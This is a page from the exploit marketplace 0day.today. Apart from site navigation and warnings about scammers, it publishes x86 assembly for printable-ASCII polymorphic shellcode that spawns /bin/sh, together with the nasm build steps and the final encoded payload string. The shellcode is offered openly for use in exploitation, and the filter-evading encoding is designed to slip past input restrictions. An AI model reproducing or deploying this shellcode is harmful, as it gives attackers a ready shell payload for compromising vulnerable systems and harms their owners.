0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
/bin/sh Polymorphic shellcode with printable ASCII characters
============================================================= /bin/sh Polymorphic shellcode with printable ASCII characters ============================================================= {========================================================================} { /bin/sh Polymorphic shellcode with printable ASCII characters } {========================================================================} Assembly code for /bin/sh polymorphic shellcode: BITS 32 ;assembly code for polymorphic shellcode push esp ; Put current ESP pop eax ; into EAX. sub eax,0x39393333 ; Subtract printable values sub eax,0x72727550 ; to add 860 to EAX. sub eax,0x54545421 push eax ; Put EAX back into ESP. pop esp ; Effectively ESP = ESP + 860 and eax,0x454e4f4a and eax,0x3a313035 ; Zero out EAX. sub eax,0x346d6d25 ; Subtract printable values sub eax,0x256d6d25 ; to make EAX = 0x80cde189. sub eax,0x2557442d ; (last 4 bytes from shellcode.bin) push eax ; Push these bytes to stack at ESP. sub eax,0x59316659 ; Subtract more printable values sub eax,0x59667766 ; to make EAX = 0x53e28951. sub eax,0x7a537a79 ; (next 4 bytes of shellcode from the end) push eax sub eax,0x25696969 sub eax,0x25786b5a sub eax,0x25774625 push eax ; EAX = 0xe3896e69 sub eax,0x366e5858 sub eax,0x25773939 sub eax,0x25747470 push eax ; EAX = 0x622f6868 sub eax,0x25257725 sub eax,0x71717171 sub eax,0x5869506a push eax ; EAX = 0x732f2f68 sub eax,0x63636363 sub eax,0x44307744 sub eax,0x7a434957 push eax ; EAX = 0x51580b6a sub eax,0x63363663 sub eax,0x6d543057 push eax ; EAX = 0x80cda4b0 sub eax,0x54545454 sub eax,0x304e4e25 sub eax,0x32346f25 sub eax,0x302d6137 push eax ; EAX = 0x99c931db sub eax,0x78474778 sub eax,0x78727272 sub eax,0x774f4661 push eax ; EAX = 0x31c03190 sub eax,0x41704170 sub eax,0x2d772d4e sub eax,0x32483242 push eax ; EAX = 0x90909090 push eax push eax ; Build a NOP sled. push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax Then use nasm on the assembly code (nasm asmcode.s) and print it (echo $(cat ./asmcode) ), you will obtain this output: -[final code]- TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6- 99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx- aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP -[/final code]- That string is your polymorphic shellcode with printable ascii characters. # 0day.today [2024-12-27] #